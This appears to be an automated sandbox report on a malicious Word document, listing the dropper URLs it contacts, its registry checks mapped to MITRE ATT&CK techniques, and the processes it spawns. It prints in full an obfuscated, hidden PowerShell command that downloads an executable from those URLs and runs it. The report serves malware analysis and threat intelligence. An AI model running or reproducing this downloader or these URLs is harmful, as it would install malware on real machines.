464a1498be6d4d1710dd23570e7d6c4a798f290ebe57ca65603966f4d8de7449

General

Target

464a1498be6d4d1710dd23570e7d6c4a798f290ebe57ca65603966f4d8de7449.doc
Sample

200129-sxhm7nm24s
SHA256

464a1498be6d4d1710dd23570e7d6c4a798f290ebe57ca65603966f4d8de7449

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://www.oasineldeserto.info/mio/8ji5-gr4qnc20-78404477/

exe.dropper

https://wieland-juettner.de/tmp/wTYnLQCN/

exe.dropper

http://humanhair.vn/wp-includes/vBmdKMH/

exe.dropper

http://upstart.ru.ac.za/87/TVYvWFb/

exe.dropper

https://www.jigsaw.watch/d3mged4g/ud5-dl1qkgvdx-290694387/

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4872	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5092	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5092	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4872	1740	Powershell.exe	73

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4872	Powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\464a1498be6d4d1710dd23570e7d6c4a798f290ebe57ca65603966f4d8de7449.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5092

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABSAGcAbwBrAHgAcgBlAGUAYgBkAGsAagBlAD0AJwBQAHMAdABtAHMAdgBtAHkAJwA7ACQAQgBxAHIAZgBkAHkAdAByACAAPQAgACcANgA1ADIAJwA7ACQASABpAGoAaAB4AGwAaABoAG0AdgBwAD0AJwBDAGIAbgBrAGkAdABzAGwAJwA7ACQAQwBlAG4AYQB0AGcAcgBsAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABCAHEAcgBmAGQAeQB0AHIAKwAnAC4AZQB4AGUAJwA7ACQATwBmAGEAZgB3AGQAZQBpAD0AJwBKAGsAdgB1AHQAZgB5AGMAeABpAGYAJwA7ACQATQBwAHIAagBoAGEAcABzAHIAaAB2AD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlAGMAJwArACcAdAAnACkAIABuAGUAdAAuAHcARQBCAGMAbABpAEUAbgB0ADsAJABMAHkAZQB0AGcAdABnAHoAbgA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG8AYQBzAGkAbgBlAGwAZABlAHMAZQByAHQAbwAuAGkAbgBmAG8ALwBtAGkAbwAvADgAagBpADUALQBnAHIANABxAG4AYwAyADAALQA3ADgANAAwADQANAA3ADcALwAqAGgAdAB0AHAAcwA6AC8ALwB3AGkAZQBsAGEAbgBkAC0AagB1AGUAdAB0AG4AZQByAC4AZABlAC8AdABtAHAALwB3AFQAWQBuAEwAUQBDAE4ALwAqAGgAdAB0AHAAOgAvAC8AaAB1AG0AYQBuAGgAYQBpAHIALgB2AG4ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwB2AEIAbQBkAEsATQBIAC8AKgBoAHQAdABwADoALwAvAHUAcABzAHQAYQByAHQALgByAHUALgBhAGMALgB6AGEALwA4ADcALwBUAFYAWQB2AFcARgBiAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBqAGkAZwBzAGEAdwAuAHcAYQB0AGMAaAAvAGQAMwBtAGcAZQBkADQAZwAvAHUAZAA1AC0AZABsADEAcQBrAGcAdgBkAHgALQAyADkAMAA2ADkANAAzADgANwAvACcALgAiAHMAcABsAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUABqAHIAaQBiAHEAeABkAGMAbABlAD0AJwBYAGcAbABkAGkAbgByAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAeABkAHkAbwBuAGYAcgBkAHcAIABpAG4AIAAkAEwAeQBlAHQAZwB0AGcAegBuACkAewB0AHIAeQB7ACQATQBwAHIAagBoAGEAcABzAHIAaAB2AC4AIgBEAE8AYAB3AE4ATABgAE8AYQBEAGAARgBpAEwARQAiACgAJABVAHgAZAB5AG8AbgBmAHIAZAB3ACwAIAAkAEMAZQBuAGEAdABnAHIAbAApADsAJABGAHMAcgBkAHUAcABuAG4AeQBvAHAAawA9ACcAVgBjAHIAYQBtAGgAegBxAHoAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABDAGUAbgBhAHQAZwByAGwAKQAuACIATABlAE4AZwBgAFQAaAAiACAALQBnAGUAIAAzADMAMwA1ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAGAAQQBSAHQAIgAoACQAQwBlAG4AYQB0AGcAcgBsACkAOwAkAFIAdQBhAHIAaABjAHcAcgBsAHAAawBtAD0AJwBPAHkAZgBoAG0AbQBsAGcAaQBmAHcAJwA7AGIAcgBlAGEAawA7ACQATQB0AG8AdABhAHYAYgB5AD0AJwBIAGcAbQBvAGQAdABmAHIAZgB3ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAawBzAGYAdgBoAGsAbAB2AHYAcQBjAD0AJwBXAHcAawByAGIAbwB2AGwAeQBiAHoAeABoACcA
1⤵
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:4872

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads